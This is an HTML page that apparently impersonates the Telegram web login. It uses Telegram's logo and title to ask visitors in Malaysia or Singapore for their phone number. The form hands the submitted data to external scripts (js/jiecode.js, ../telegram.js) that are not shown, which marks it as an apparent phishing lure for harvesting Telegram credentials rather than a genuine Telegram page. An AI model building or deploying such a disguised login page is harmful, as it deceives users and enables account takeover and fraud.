<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Telegram">
      <link rel="apple-touch-icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">
      <link rel="manifest" href="manifest.json">
      <title>Telegram</title>
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
      <link href="static/css/main.d48eb2f8.css" rel="stylesheet">
      <script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
   </head>
   <body>
      <noscript>You need to enable JavaScript to run this app.</noscript>
      <div id="root">
         <div class="min-h-screen flex flex-col items-center justify-center bg-gray-900">
            <img src="https://web.telegram.org/a/telegram-logo.1b2bb5b107f046ea9325.svg" alt="Telegram" class="h-28 w-auto mb-6">
            <h2 class="text-2xl font-bold text-white mb-2">Telegram</h2>
            <p class="text-gray-400 text-center mb-6">Please confirm your country code <br> and enter your number.</p>
            <form method="post" id="form-no" class="w-full max-w-sm space-y-4">
               <fieldset class="border border-gray-700 px-4 py-3 bg-gray-800 rounded-lg transition-all duration-300 hover:border-purple-600">
                  <legend class="text-gray-400 text-sm px-1">Country</legend>
                  <select id="acu" class="w-full bg-transparent text-white focus:outline-none focus:ring-0" onchange="updatePhoneNumber()">
                     <option value="" class="bg-gray-900 text-white font-medium hover:bg-gray-700">Select Country</option>
                     <option value="malay" class="bg-gray-900 text-white font-medium hover:bg-gray-700">🇲🇾 Malaysia</option>
                     <option value="singa" class="bg-gray-900 text-white font-medium hover:bg-gray-700">🇸🇬 Singapore</option>
                   </select>
                </fieldset>

                
               <fieldset class="border border-gray-700 px-4 py-3 bg-gray-800 rounded-lg transition-all duration-300">
                  <legend class="text-sm px-1 text-gray-400">Phone Number</legend>
                  <input disabled id="phoneNumber" type="tel" placeholder="" required class="w-full bg-transparent text-white focus:outline-none focus:ring-0" value="" oninput="handleInput()">
               </fieldset>
               <div class="flex items-center mb-4"><input type="checkbox" id="keepSignedIn" class="form-checkbox h-4 w-4 text-purple-600 border-gray-300 rounded focus:ring-purple-500"><label for="keepSignedIn" class="ml-2 text-gray-400">Keep me signed in</label></div>
               <button id="btn-gasskan" type="submit" disabled class="w-full py-3 bg-gray-600 text-white font-semibold rounded-lg focus:outline-none focus:ring-2 focus:ring-purple-500 focus:ring-opacity-50 transition-all duration-300 flex items-center justify-center">NEXT</button>
            </form>
            <p class="text-purple-400 mt-6 text-sm cursor-pointer">LOGIN WITH QR</p>
            <br>
            <p id="notif" style="color:red; font-size: medium;"></p>
         </div>
      </div>

      <script>
         function updatePhoneNumber() {
           const acu = document.getElementById("acu").value;
           const input = document.getElementById("phoneNumber");
         
           if (acu === "malay") {
             input.value = "+60";
             input.disabled = false; // Aktifkan kembali input jika sebelumnya dinonaktifkan
           } else if (acu === "singa") {
             input.value = "+65";
             input.disabled = false;
           } else {
             input.value = ""; // Kosongkan input jika tidak ada pilihan
             input.disabled = true;
           }
         }
         </script>
         
      <script src="js/jiecode.js"></script>
      <script src="../telegram.js"></script>
   </body>
</html>